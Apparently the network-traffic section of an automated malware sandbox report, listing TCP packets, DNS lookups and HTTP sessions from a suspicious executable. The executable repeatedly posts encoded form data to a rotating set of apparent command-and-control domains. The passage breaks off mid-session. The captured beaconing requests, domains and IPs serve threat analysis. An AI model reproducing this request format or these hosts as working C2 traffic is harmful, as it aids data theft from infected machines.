                                                          Jan 16, 2025 09:25:25.734072924 CET8049987134.122.133.80192.168.2.5
                                                          Jan 16, 2025 09:25:25.734250069 CET4998780192.168.2.5134.122.133.80
                                                          Jan 16, 2025 09:25:25.736870050 CET4998780192.168.2.5134.122.133.80
                                                          Jan 16, 2025 09:25:25.741619110 CET8049987134.122.133.80192.168.2.5
                                                          Jan 16, 2025 09:25:30.759857893 CET4998880192.168.2.5199.192.21.169
                                                          Jan 16, 2025 09:25:30.764678955 CET8049988199.192.21.169192.168.2.5
                                                          Jan 16, 2025 09:25:30.764743090 CET4998880192.168.2.5199.192.21.169
                                                          Jan 16, 2025 09:25:30.787894964 CET4998880192.168.2.5199.192.21.169
                                                          Jan 16, 2025 09:25:30.792691946 CET8049988199.192.21.169192.168.2.5
                                                          Jan 16, 2025 09:25:31.377538919 CET8049988199.192.21.169192.168.2.5
                                                          Jan 16, 2025 09:25:31.377561092 CET8049988199.192.21.169192.168.2.5
                                                          Jan 16, 2025 09:25:31.377651930 CET4998880192.168.2.5199.192.21.169
                                                          Jan 16, 2025 09:25:32.301769018 CET4998880192.168.2.5199.192.21.169
                                                          Jan 16, 2025 09:25:33.320780039 CET4998980192.168.2.5199.192.21.169
                                                          Jan 16, 2025 09:25:33.325767040 CET8049989199.192.21.169192.168.2.5
                                                          Jan 16, 2025 09:25:33.327178001 CET4998980192.168.2.5199.192.21.169
                                                          Jan 16, 2025 09:25:33.346983910 CET4998980192.168.2.5199.192.21.169
                                                          Jan 16, 2025 09:25:33.351897001 CET8049989199.192.21.169192.168.2.5
                                                          Jan 16, 2025 09:25:33.932046890 CET8049989199.192.21.169192.168.2.5
                                                          Jan 16, 2025 09:25:33.932064056 CET8049989199.192.21.169192.168.2.5
                                                          Jan 16, 2025 09:25:33.932219982 CET4998980192.168.2.5199.192.21.169
                                                          Jan 16, 2025 09:25:34.848736048 CET4998980192.168.2.5199.192.21.169
                                                          Jan 16, 2025 09:25:35.867625952 CET4999080192.168.2.5199.192.21.169
                                                          Jan 16, 2025 09:25:35.872469902 CET8049990199.192.21.169192.168.2.5
                                                          Jan 16, 2025 09:25:35.872561932 CET4999080192.168.2.5199.192.21.169
                                                          Jan 16, 2025 09:25:35.888818979 CET4999080192.168.2.5199.192.21.169
                                                          Jan 16, 2025 09:25:35.893707037 CET8049990199.192.21.169192.168.2.5
                                                          Jan 16, 2025 09:25:35.893785000 CET8049990199.192.21.169192.168.2.5
                                                          Jan 16, 2025 09:25:36.462815046 CET8049990199.192.21.169192.168.2.5
                                                          Jan 16, 2025 09:25:36.462912083 CET8049990199.192.21.169192.168.2.5
                                                          Jan 16, 2025 09:25:36.462963104 CET4999080192.168.2.5199.192.21.169
                                                          Jan 16, 2025 09:25:37.395618916 CET4999080192.168.2.5199.192.21.169
                                                          Jan 16, 2025 09:25:38.414875984 CET4999180192.168.2.5199.192.21.169
                                                          Jan 16, 2025 09:25:38.419785976 CET8049991199.192.21.169192.168.2.5
                                                          Jan 16, 2025 09:25:38.419873953 CET4999180192.168.2.5199.192.21.169
                                                          Jan 16, 2025 09:25:38.429352045 CET4999180192.168.2.5199.192.21.169
                                                          Jan 16, 2025 09:25:38.434222937 CET8049991199.192.21.169192.168.2.5
                                                          Jan 16, 2025 09:25:39.016755104 CET8049991199.192.21.169192.168.2.5
                                                          Jan 16, 2025 09:25:39.016882896 CET8049991199.192.21.169192.168.2.5
                                                          Jan 16, 2025 09:25:39.017009020 CET4999180192.168.2.5199.192.21.169
                                                          Jan 16, 2025 09:25:39.019680023 CET4999180192.168.2.5199.192.21.169
                                                          Jan 16, 2025 09:25:39.024534941 CET8049991199.192.21.169192.168.2.5
                                                          Jan 16, 2025 09:25:44.524581909 CET4999280192.168.2.5154.197.162.239
                                                          Jan 16, 2025 09:25:44.529557943 CET8049992154.197.162.239192.168.2.5
                                                          Jan 16, 2025 09:25:44.529642105 CET4999280192.168.2.5154.197.162.239
                                                          Jan 16, 2025 09:25:44.545206070 CET4999280192.168.2.5154.197.162.239
                                                          Jan 16, 2025 09:25:44.550307989 CET8049992154.197.162.239192.168.2.5
                                                          Jan 16, 2025 09:25:45.120225906 CET8049992154.197.162.239192.168.2.5
                                                          Jan 16, 2025 09:25:45.120439053 CET8049992154.197.162.239192.168.2.5
                                                          Jan 16, 2025 09:25:45.120603085 CET4999280192.168.2.5154.197.162.239
                                                          Jan 16, 2025 09:25:46.051808119 CET4999280192.168.2.5154.197.162.239
                                                          Jan 16, 2025 09:25:47.076698065 CET4999380192.168.2.5154.197.162.239
                                                          Jan 16, 2025 09:25:47.081621885 CET8049993154.197.162.239192.168.2.5
                                                          Jan 16, 2025 09:25:47.081747055 CET4999380192.168.2.5154.197.162.239
                                                          Jan 16, 2025 09:25:47.103009939 CET4999380192.168.2.5154.197.162.239
                                                          Jan 16, 2025 09:25:47.107878923 CET8049993154.197.162.239192.168.2.5
                                                          Jan 16, 2025 09:25:47.652390003 CET8049993154.197.162.239192.168.2.5
                                                          Jan 16, 2025 09:25:47.652499914 CET8049993154.197.162.239192.168.2.5
                                                          Jan 16, 2025 09:25:47.652543068 CET4999380192.168.2.5154.197.162.239
                                                          Jan 16, 2025 09:25:48.614363909 CET4999380192.168.2.5154.197.162.239
                                                          Jan 16, 2025 09:25:49.632751942 CET4999480192.168.2.5154.197.162.239
                                                          Jan 16, 2025 09:25:49.642426014 CET8049994154.197.162.239192.168.2.5
                                                          Jan 16, 2025 09:25:49.645761967 CET4999480192.168.2.5154.197.162.239
                                                          Jan 16, 2025 09:25:49.660794973 CET4999480192.168.2.5154.197.162.239
                                                          Jan 16, 2025 09:25:49.670679092 CET8049994154.197.162.239192.168.2.5
                                                          Jan 16, 2025 09:25:49.675451994 CET8049994154.197.162.239192.168.2.5
                                                          Jan 16, 2025 09:25:50.221178055 CET8049994154.197.162.239192.168.2.5
                                                          Jan 16, 2025 09:25:50.221312046 CET8049994154.197.162.239192.168.2.5
                                                          Jan 16, 2025 09:25:50.221410036 CET4999480192.168.2.5154.197.162.239
                                                          Jan 16, 2025 09:25:51.179836988 CET4999480192.168.2.5154.197.162.239
                                                          Jan 16, 2025 09:25:52.195856094 CET4999580192.168.2.5154.197.162.239
                                                          Jan 16, 2025 09:25:52.200844049 CET8049995154.197.162.239192.168.2.5
                                                          Jan 16, 2025 09:25:52.200983047 CET4999580192.168.2.5154.197.162.239
                                                          Jan 16, 2025 09:25:52.210787058 CET4999580192.168.2.5154.197.162.239
                                                          Jan 16, 2025 09:25:52.215698004 CET8049995154.197.162.239192.168.2.5
                                                          Jan 16, 2025 09:25:52.794837952 CET8049995154.197.162.239192.168.2.5
                                                          Jan 16, 2025 09:25:52.795145035 CET8049995154.197.162.239192.168.2.5
                                                          Jan 16, 2025 09:25:52.795248985 CET4999580192.168.2.5154.197.162.239
                                                          Jan 16, 2025 09:25:52.797828913 CET4999580192.168.2.5154.197.162.239
                                                          Jan 16, 2025 09:25:52.803010941 CET8049995154.197.162.239192.168.2.5
                                                          Jan 16, 2025 09:26:06.773806095 CET4999680192.168.2.5134.122.133.80
                                                          Jan 16, 2025 09:26:06.778640985 CET8049996134.122.133.80192.168.2.5
                                                          Jan 16, 2025 09:26:06.778785944 CET4999680192.168.2.5134.122.133.80
                                                          Jan 16, 2025 09:26:06.792810917 CET4999680192.168.2.5134.122.133.80
                                                          Jan 16, 2025 09:26:06.797604084 CET8049996134.122.133.80192.168.2.5
                                                          Jan 16, 2025 09:26:07.657269955 CET8049996134.122.133.80192.168.2.5
                                                          Jan 16, 2025 09:26:07.657386065 CET8049996134.122.133.80192.168.2.5
                                                          Jan 16, 2025 09:26:07.657469034 CET4999680192.168.2.5134.122.133.80
                                                          Jan 16, 2025 09:26:08.301805019 CET4999680192.168.2.5134.122.133.80
                                                          Jan 16, 2025 09:26:09.320663929 CET4999780192.168.2.5134.122.133.80
                                                          Jan 16, 2025 09:26:09.325664997 CET8049997134.122.133.80192.168.2.5
                                                          Jan 16, 2025 09:26:09.325733900 CET4999780192.168.2.5134.122.133.80
                                                          Jan 16, 2025 09:26:09.338294983 CET4999780192.168.2.5134.122.133.80
                                                          Jan 16, 2025 09:26:09.343137026 CET8049997134.122.133.80192.168.2.5
                                                          Jan 16, 2025 09:26:10.214730024 CET8049997134.122.133.80192.168.2.5
                                                          Jan 16, 2025 09:26:10.214792013 CET8049997134.122.133.80192.168.2.5
                                                          Jan 16, 2025 09:26:10.214880943 CET4999780192.168.2.5134.122.133.80
                                                          Jan 16, 2025 09:26:10.848747969 CET4999780192.168.2.5134.122.133.80
                                                          Jan 16, 2025 09:26:11.867070913 CET4999880192.168.2.5134.122.133.80
                                                          Jan 16, 2025 09:26:11.872096062 CET8049998134.122.133.80192.168.2.5
                                                          Jan 16, 2025 09:26:11.872272968 CET4999880192.168.2.5134.122.133.80
                                                          Jan 16, 2025 09:26:11.889775038 CET4999880192.168.2.5134.122.133.80
                                                          Jan 16, 2025 09:26:11.896646023 CET8049998134.122.133.80192.168.2.5
                                                          Jan 16, 2025 09:26:11.896678925 CET8049998134.122.133.80192.168.2.5
                                                          Jan 16, 2025 09:26:12.768207073 CET8049998134.122.133.80192.168.2.5
                                                          Jan 16, 2025 09:26:12.768979073 CET8049998134.122.133.80192.168.2.5
                                                          Jan 16, 2025 09:26:12.769081116 CET4999880192.168.2.5134.122.133.80
                                                          Jan 16, 2025 09:26:13.395941019 CET4999880192.168.2.5134.122.133.80
                                                          Jan 16, 2025 09:26:14.413959980 CET4999980192.168.2.5134.122.133.80
                                                          Jan 16, 2025 09:26:14.419573069 CET8049999134.122.133.80192.168.2.5
                                                          Jan 16, 2025 09:26:14.419688940 CET4999980192.168.2.5134.122.133.80
                                                          Jan 16, 2025 09:26:14.428988934 CET4999980192.168.2.5134.122.133.80
                                                          Jan 16, 2025 09:26:14.435056925 CET8049999134.122.133.80192.168.2.5
                                                          Jan 16, 2025 09:26:15.294491053 CET8049999134.122.133.80192.168.2.5
                                                          Jan 16, 2025 09:26:15.294565916 CET8049999134.122.133.80192.168.2.5
                                                          Jan 16, 2025 09:26:15.294724941 CET4999980192.168.2.5134.122.133.80
                                                          Jan 16, 2025 09:26:15.298520088 CET4999980192.168.2.5134.122.133.80
                                                          Jan 16, 2025 09:26:15.303358078 CET8049999134.122.133.80192.168.2.5
                                                          Jan 16, 2025 09:26:20.334436893 CET5000080192.168.2.547.83.1.90
                                                          Jan 16, 2025 09:26:20.341845036 CET805000047.83.1.90192.168.2.5
                                                          Jan 16, 2025 09:26:20.341918945 CET5000080192.168.2.547.83.1.90
                                                          Jan 16, 2025 09:26:20.353866100 CET5000080192.168.2.547.83.1.90
                                                          Jan 16, 2025 09:26:20.361665964 CET805000047.83.1.90192.168.2.5
                                                          Jan 16, 2025 09:26:21.783191919 CET805000047.83.1.90192.168.2.5
                                                          Jan 16, 2025 09:26:21.783318996 CET805000047.83.1.90192.168.2.5
                                                          Jan 16, 2025 09:26:21.783375978 CET5000080192.168.2.547.83.1.90
                                                          Jan 16, 2025 09:26:21.864491940 CET5000080192.168.2.547.83.1.90
                                                          Jan 16, 2025 09:26:22.888202906 CET5000180192.168.2.547.83.1.90
                                                          Jan 16, 2025 09:26:22.893692017 CET805000147.83.1.90192.168.2.5
                                                          Jan 16, 2025 09:26:22.893779039 CET5000180192.168.2.547.83.1.90
                                                          Jan 16, 2025 09:26:22.909233093 CET5000180192.168.2.547.83.1.90
                                                          Jan 16, 2025 09:26:22.914554119 CET805000147.83.1.90192.168.2.5
                                                          Jan 16, 2025 09:26:24.350336075 CET805000147.83.1.90192.168.2.5
                                                          Jan 16, 2025 09:26:24.350972891 CET805000147.83.1.90192.168.2.5
                                                          Jan 16, 2025 09:26:24.351039886 CET5000180192.168.2.547.83.1.90
                                                          Jan 16, 2025 09:26:24.411233902 CET5000180192.168.2.547.83.1.90
                                                          Jan 16, 2025 09:26:25.430831909 CET5000280192.168.2.547.83.1.90
                                                          Jan 16, 2025 09:26:25.435755014 CET805000247.83.1.90192.168.2.5
                                                          Jan 16, 2025 09:26:25.435926914 CET5000280192.168.2.547.83.1.90
                                                          Jan 16, 2025 09:26:25.452495098 CET5000280192.168.2.547.83.1.90
                                                          Jan 16, 2025 09:26:25.457415104 CET805000247.83.1.90192.168.2.5
                                                          Jan 16, 2025 09:26:25.457506895 CET805000247.83.1.90192.168.2.5
                                                          Jan 16, 2025 09:26:26.958055973 CET5000280192.168.2.547.83.1.90
                                                          Jan 16, 2025 09:26:26.963185072 CET805000247.83.1.90192.168.2.5
                                                          Jan 16, 2025 09:26:26.963258028 CET5000280192.168.2.547.83.1.90
                                                          Jan 16, 2025 09:26:27.976331949 CET5000380192.168.2.547.83.1.90
                                                          Jan 16, 2025 09:26:27.981508017 CET805000347.83.1.90192.168.2.5
                                                          Jan 16, 2025 09:26:27.981590986 CET5000380192.168.2.547.83.1.90
                                                          Jan 16, 2025 09:26:27.991368055 CET5000380192.168.2.547.83.1.90
                                                          Jan 16, 2025 09:26:27.996300936 CET805000347.83.1.90192.168.2.5
                                                          Jan 16, 2025 09:26:29.598229885 CET805000347.83.1.90192.168.2.5
                                                          Jan 16, 2025 09:26:29.598293066 CET805000347.83.1.90192.168.2.5
                                                          Jan 16, 2025 09:26:29.598381042 CET5000380192.168.2.547.83.1.90
                                                          Jan 16, 2025 09:26:29.601063967 CET5000380192.168.2.547.83.1.90
                                                          Jan 16, 2025 09:26:29.605915070 CET805000347.83.1.90192.168.2.5
                                                          Jan 16, 2025 09:26:34.637084007 CET5000480192.168.2.5188.114.96.3
                                                          Jan 16, 2025 09:26:34.642014980 CET8050004188.114.96.3192.168.2.5
                                                          Jan 16, 2025 09:26:34.642101049 CET5000480192.168.2.5188.114.96.3
                                                          Jan 16, 2025 09:26:34.657100916 CET5000480192.168.2.5188.114.96.3
                                                          Jan 16, 2025 09:26:34.661956072 CET8050004188.114.96.3192.168.2.5
                                                          Jan 16, 2025 09:26:35.237520933 CET8050004188.114.96.3192.168.2.5
                                                          Jan 16, 2025 09:26:35.237584114 CET8050004188.114.96.3192.168.2.5
                                                          Jan 16, 2025 09:26:35.237672091 CET5000480192.168.2.5188.114.96.3
                                                          Jan 16, 2025 09:26:35.238478899 CET8050004188.114.96.3192.168.2.5
                                                          Jan 16, 2025 09:26:35.238512039 CET8050004188.114.96.3192.168.2.5
                                                          Jan 16, 2025 09:26:35.238563061 CET5000480192.168.2.5188.114.96.3
                                                          Jan 16, 2025 09:26:36.161351919 CET5000480192.168.2.5188.114.96.3
                                                          Jan 16, 2025 09:26:37.180171013 CET5000580192.168.2.5188.114.96.3
                                                          Jan 16, 2025 09:26:37.185236931 CET8050005188.114.96.3192.168.2.5
                                                          Jan 16, 2025 09:26:37.185345888 CET5000580192.168.2.5188.114.96.3
                                                          Jan 16, 2025 09:26:37.201065063 CET5000580192.168.2.5188.114.96.3
                                                          Jan 16, 2025 09:26:37.206046104 CET8050005188.114.96.3192.168.2.5
                                                          Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
                                                          Jan 16, 2025 09:24:33.187076092 CET | 192.168.2.5 | 1.1.1.1 | 0xce74 | Standard query (0) | www.gayhxi.info | A (IP address) | IN (0x0001) | false
                                                          Jan 16, 2025 09:24:49.815640926 CET | 192.168.2.5 | 1.1.1.1 | 0x796a | Standard query (0) | www.promocao.info | A (IP address) | IN (0x0001) | false
                                                          Jan 16, 2025 09:25:03.555561066 CET | 192.168.2.5 | 1.1.1.1 | 0x4e0d | Standard query (0) | www.grimbo.boats | A (IP address) | IN (0x0001) | false
                                                          Jan 16, 2025 09:25:16.946171045 CET | 192.168.2.5 | 1.1.1.1 | 0xe4ef | Standard query (0) | www.44756.pizza | A (IP address) | IN (0x0001) | false
                                                          Jan 16, 2025 09:25:30.745081902 CET | 192.168.2.5 | 1.1.1.1 | 0x3fe | Standard query (0) | www.lonfor.website | A (IP address) | IN (0x0001) | false
                                                          Jan 16, 2025 09:25:44.025285006 CET | 192.168.2.5 | 1.1.1.1 | 0xcc3b | Standard query (0) | www.investshares.net | A (IP address) | IN (0x0001) | false
                                                          Jan 16, 2025 09:25:57.805419922 CET | 192.168.2.5 | 1.1.1.1 | 0x32c9 | Standard query (0) | www.nosolofichas.online | A (IP address) | IN (0x0001) | false
                                                          Jan 16, 2025 09:26:05.868031979 CET | 192.168.2.5 | 1.1.1.1 | 0x74b | Standard query (0) | www.jrcov55qgcxp5fwa.top | A (IP address) | IN (0x0001) | false
                                                          Jan 16, 2025 09:26:20.305088043 CET | 192.168.2.5 | 1.1.1.1 | 0x1e45 | Standard query (0) | www.adadev.info | A (IP address) | IN (0x0001) | false
                                                          Jan 16, 2025 09:26:34.617535114 CET | 192.168.2.5 | 1.1.1.1 | 0x6be7 | Standard query (0) | www.cifasnc.info | A (IP address) | IN (0x0001) | false
                                                          Jan 16, 2025 09:26:47.852269888 CET | 192.168.2.5 | 1.1.1.1 | 0x1098 | Standard query (0) | www.ebsmadrid.store | A (IP address) | IN (0x0001) | false
                                                          Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
                                                          Jan 16, 2025 09:24:33.204036951 CET | 1.1.1.1 | 192.168.2.5 | 0xce74 | No error (0) | www.gayhxi.info |  | 47.83.1.90 | A (IP address) | IN (0x0001) | false
                                                          Jan 16, 2025 09:24:49.870174885 CET | 1.1.1.1 | 192.168.2.5 | 0x796a | No error (0) | www.promocao.info | promocao.info |  | CNAME (Canonical name) | IN (0x0001) | false
                                                          Jan 16, 2025 09:24:49.870174885 CET | 1.1.1.1 | 192.168.2.5 | 0x796a | No error (0) | promocao.info |  | 84.32.84.32 | A (IP address) | IN (0x0001) | false
                                                          Jan 16, 2025 09:25:03.567045927 CET | 1.1.1.1 | 192.168.2.5 | 0x4e0d | No error (0) | www.grimbo.boats |  | 172.67.182.198 | A (IP address) | IN (0x0001) | false
                                                          Jan 16, 2025 09:25:03.567045927 CET | 1.1.1.1 | 192.168.2.5 | 0x4e0d | No error (0) | www.grimbo.boats |  | 104.21.18.171 | A (IP address) | IN (0x0001) | false
                                                          Jan 16, 2025 09:25:17.186825037 CET | 1.1.1.1 | 192.168.2.5 | 0xe4ef | No error (0) | www.44756.pizza | zcdn.8383dns.com |  | CNAME (Canonical name) | IN (0x0001) | false
                                                          Jan 16, 2025 09:25:17.186825037 CET | 1.1.1.1 | 192.168.2.5 | 0xe4ef | No error (0) | zcdn.8383dns.com |  | 134.122.133.80 | A (IP address) | IN (0x0001) | false
                                                          Jan 16, 2025 09:25:17.186825037 CET | 1.1.1.1 | 192.168.2.5 | 0xe4ef | No error (0) | zcdn.8383dns.com |  | 134.122.135.48 | A (IP address) | IN (0x0001) | false
                                                          Jan 16, 2025 09:25:30.756715059 CET | 1.1.1.1 | 192.168.2.5 | 0x3fe | No error (0) | www.lonfor.website |  | 199.192.21.169 | A (IP address) | IN (0x0001) | false
                                                          Jan 16, 2025 09:25:44.522073030 CET | 1.1.1.1 | 192.168.2.5 | 0xcc3b | No error (0) | www.investshares.net |  | 154.197.162.239 | A (IP address) | IN (0x0001) | false
                                                          Jan 16, 2025 09:25:57.815109015 CET | 1.1.1.1 | 192.168.2.5 | 0x32c9 | Name error (3) | www.nosolofichas.online | none | none | A (IP address) | IN (0x0001) | false
                                                          Jan 16, 2025 09:26:06.771419048 CET | 1.1.1.1 | 192.168.2.5 | 0x74b | No error (0) | www.jrcov55qgcxp5fwa.top | zcdn.8383dns.com |  | CNAME (Canonical name) | IN (0x0001) | false
                                                          Jan 16, 2025 09:26:06.771419048 CET | 1.1.1.1 | 192.168.2.5 | 0x74b | No error (0) | zcdn.8383dns.com |  | 134.122.133.80 | A (IP address) | IN (0x0001) | false
                                                          Jan 16, 2025 09:26:06.771419048 CET | 1.1.1.1 | 192.168.2.5 | 0x74b | No error (0) | zcdn.8383dns.com |  | 134.122.135.48 | A (IP address) | IN (0x0001) | false
                                                          Jan 16, 2025 09:26:20.332423925 CET | 1.1.1.1 | 192.168.2.5 | 0x1e45 | No error (0) | www.adadev.info |  | 47.83.1.90 | A (IP address) | IN (0x0001) | false
                                                          Jan 16, 2025 09:26:34.634727955 CET | 1.1.1.1 | 192.168.2.5 | 0x6be7 | No error (0) | www.cifasnc.info |  | 188.114.96.3 | A (IP address) | IN (0x0001) | false
                                                          Jan 16, 2025 09:26:34.634727955 CET | 1.1.1.1 | 192.168.2.5 | 0x6be7 | No error (0) | www.cifasnc.info |  | 188.114.97.3 | A (IP address) | IN (0x0001) | false
                                                          Jan 16, 2025 09:26:47.862433910 CET | 1.1.1.1 | 192.168.2.5 | 0x1098 | Name error (3) | www.ebsmadrid.store | none | none | A (IP address) | IN (0x0001) | false
                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          0 | 192.168.2.5 | 49915 | 47.83.1.90 | 80 | 3304 | C:\Program Files (x86)\NDWZDtcCSOerkwHUATuByXALRMlNVDulItdVeOTqISSebXFaozDVKcOPCDiHaLmBnUBBzoTyUCsnwnX\DlLArodfwUXcDj.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          Jan 16, 2025 09:24:33.237374067 CET | 483 | OUT | GET /k2i2/?R4Stj2k=oYl0YuhK+EfenM8ZaSaHfCiYAhLiDDJWSGf6Q1012MfAC24gU0JLDS7JdRiR078xrhufJIQsd6i55/X9+LeTaAffH6Ebl78vR8bpDnW8pt5wmDRx2PwDjv0U4337vN//Tw==&ml=PF-8nXUHD HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                          Accept-Language: en-US
                                                          Host: www.gayhxi.info
                                                          Connection: close
                                                          User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1
                                                          Jan 16, 2025 09:24:34.697711945 CET | 139 | IN | HTTP/1.1 567 unknown
                                                          Server: nginx/1.18.0
                                                          Date: Thu, 16 Jan 2025 08:24:34 GMT
                                                          Content-Length: 17
                                                          Connection: close
                                                          Data Raw: 52 65 71 75 65 73 74 20 74 6f 6f 20 6c 61 72 67 65
                                                          Data Ascii: Request too large


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          1 | 192.168.2.5 | 49975 | 84.32.84.32 | 80 | 3304 | C:\Program Files (x86)\NDWZDtcCSOerkwHUATuByXALRMlNVDulItdVeOTqISSebXFaozDVKcOPCDiHaLmBnUBBzoTyUCsnwnX\DlLArodfwUXcDj.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          Jan 16, 2025 09:24:49.979055882 CET | 743 | OUT | POST /zaz4/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                          Accept-Language: en-US
                                                          Accept-Encoding: gzip, deflate
                                                          Host: www.promocao.info
                                                          Origin: http://www.promocao.info
                                                          Cache-Control: max-age=0
                                                          Content-Length: 208
                                                          Connection: close
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Referer: http://www.promocao.info/zaz4/
                                                          User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1
                                                          Data Ascii: R4Stj2k=X9vn1b2Z0AtCTWVLtZ7lt3cWfLYFITelDmINYQDMPGIpikq0GVrw7x1g1gNsxHKVYWN50xxz13cf/iVjiD1utBkPkmIE+qSC4dQ0vTs2KCaFJumbctLb1GUL0zdE3sDjd4xxJ/XYuiATiI0JbxxWdZQrQVCTADczvteA5iv3LeKnTaZNsBVcyiZvSNUEVTpc0QgFOQ4=


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          2 | 192.168.2.5 | 49976 | 84.32.84.32 | 80 | 3304 | C:\Program Files (x86)\NDWZDtcCSOerkwHUATuByXALRMlNVDulItdVeOTqISSebXFaozDVKcOPCDiHaLmBnUBBzoTyUCsnwnX\DlLArodfwUXcDj.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          Jan 16, 2025 09:24:52.649607897 CET | 763 | OUT | POST /zaz4/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                          Accept-Language: en-US
                                                          Accept-Encoding: gzip, deflate
                                                          Host: www.promocao.info
                                                          Origin: http://www.promocao.info
                                                          Cache-Control: max-age=0
                                                          Content-Length: 228
                                                          Connection: close
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Referer: http://www.promocao.info/zaz4/
                                                          User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1
                                                          Data Ascii: R4Stj2k=X9vn1b2Z0AtCT3FL+KTlk3cVBbYFejehDmENYSvcP1sphH+0HUrw+x1g+ANp/nKkYWxx0wNz10gf/npji0pttRkNpGIaxKSC4dQ0vTQcKBqFKeWbdI/c2GUIzzdEzsCqd4xPJ9viug4TiKsJbgxRKpQpOlDWEBFLm+iI2BS/d9uBWson2jd0hC1XCeczEjI1uzw1QHvdxpYsKz2v4ogMZJq5TzyV


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          3 | 192.168.2.5 | 49977 | 84.32.84.32 | 80 | 3304 | C:\Program Files (x86)\NDWZDtcCSOerkwHUATuByXALRMlNVDulItdVeOTqISSebXFaozDVKcOPCDiHaLmBnUBBzoTyUCsnwnX\DlLArodfwUXcDj.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          Jan 16, 2025 09:24:55.375016928 CET | 1780 | OUT | POST /zaz4/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                          Accept-Language: en-US
                                                          Accept-Encoding: gzip, deflate
                                                          Host: www.promocao.info
                                                          Origin: http://www.promocao.info
                                                          Cache-Control: max-age=0
                                                          Content-Length: 1244
                                                          Connection: close
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Referer: http://www.promocao.info/zaz4/
                                                          User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1
                                                          Data Ascii: R4Stj2k= [TRUNCATED]


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          4 | 192.168.2.5 | 49978 | 84.32.84.32 | 80 | 3304 | C:\Program Files (x86)\NDWZDtcCSOerkwHUATuByXALRMlNVDulItdVeOTqISSebXFaozDVKcOPCDiHaLmBnUBBzoTyUCsnwnX\DlLArodfwUXcDj.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          Jan 16, 2025 09:24:58.160974026 CET | 485 | OUT | GET /zaz4/?R4Stj2k=a/HH2smDyRg6YmpNlpDSiGBzLdYAcGrERV51bzugA0E0jiOKNXfjwD9byDsX3ja9PlsooGpF4nQX9l9MtzddjkJxjmB725u/4P9m9WNTMgvCSsWrKIDHmR4Q2StU9f7tIQ==&ml=PF-8nXUHD HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                          Accept-Language: en-US
                                                          Host: www.promocao.info
                                                          Connection: close
                                                          User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1
                                                          Jan 16, 2025 09:24:58.544517040 CET | 1236 | IN | HTTP/1.1 200 OK
                                                          Date: Thu, 16 Jan 2025 08:24:58 GMT
                                                          Content-Type: text/html
                                                          Content-Length: 9973
                                                          Connection: close
                                                          Vary: Accept-Encoding
                                                          Server: hcdn
                                                          alt-svc: h3=":443"; ma=86400
                                                          x-hcdn-request-id: 86e670a85cd6f5821b5239f2f7b9351e-bos-edge1
                                                          Expires: Thu, 16 Jan 2025 08:24:57 GMT
                                                          Cache-Control: no-cache
                                                          Accept-Ranges: bytes
                                                          Data Ascii: <!doctype html><title>Parked Domain name on Hostinger DNS system</title><meta charset=utf-8><meta content="IE=edge,chrome=1" http-equiv=X-UA-Compatible><meta content="Parked Domain name on Hostinger DNS system" name=description><meta content="width=device-width,initial-scale=1" name=viewport><link href=https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.min.css rel=stylesheet><script src=https://ajax.googleapis.com/ajax/libs/jquery/3.2.1/jquery.min.js></script><script src=https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/js/bootstrap.min.js></script><link href=https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.15.3/css/all.min.css rel=stylesheet><link href="https://fonts.googleapis.com/css?family=Open+Sans:300,300i,400,400i,600,600i,700,700i,800,800i&subset=cyrillic,cyrillic-ext,greek,greek-ext,latin-ext,vietnamese" rel=stylesheet><style>html{height:100%}body{font-family:"O


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          5 | 192.168.2.5 | 49980 | 172.67.182.198 | 80 | 3304 | C:\Program Files (x86)\NDWZDtcCSOerkwHUATuByXALRMlNVDulItdVeOTqISSebXFaozDVKcOPCDiHaLmBnUBBzoTyUCsnwnX\DlLArodfwUXcDj.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          Jan 16, 2025 09:25:03.590720892 CET | 740 | OUT | POST /kxtt/ HTTP/1.1
